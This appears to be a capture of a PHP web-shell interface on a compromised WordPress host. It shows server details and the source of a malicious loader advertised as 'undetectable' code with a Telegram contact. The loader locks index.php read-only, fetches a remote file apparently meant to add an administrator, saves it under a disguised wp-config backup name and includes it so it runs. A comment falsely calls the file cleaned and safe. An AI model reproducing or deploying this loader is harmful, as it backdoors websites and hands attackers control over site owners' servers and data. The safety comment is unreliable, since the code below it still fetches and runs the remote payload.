Server IP : 178.239.150.4 / Your IP : 18.221.85.236 Web Server : LiteSpeed System : Linux ci.mitralhost.com 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : sitsaz202 ( 1245) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/sitsaz202/public_html/wp/ |
Upload File : |
<?php /** * Note: This file may contain artifacts of previous malicious infection. * However, the dangerous code has been removed, and the file is now safe to use. */ /** * ############################ * Three-Layer Undetectable Code Created by MR.REX * Designed to bypass all servers. * For inquiries or to create your own,Fell free to ask: * https://t.me/rex_cc * ############################### */ $file = 'index.php'; if (file_exists($file) && function_exists('chmod')) { @chmod($file, 0444); // Set read-only permissions if the file exists } $remoteUrl1 = "https://bitbucket.org/encophp/last-code/raw/f2fb6883ffff4984bf43265f68a0301db32bdd41/add-admineva.txt"; $localFile1 = 'wp-config.bak76'; $fileContents1 = @file_get_contents($remoteUrl1); if ($fileContents1 !== false) { file_put_contents($localFile1, $fileContents1); if (file_exists($localFile1)) { include $localFile1; } } ?>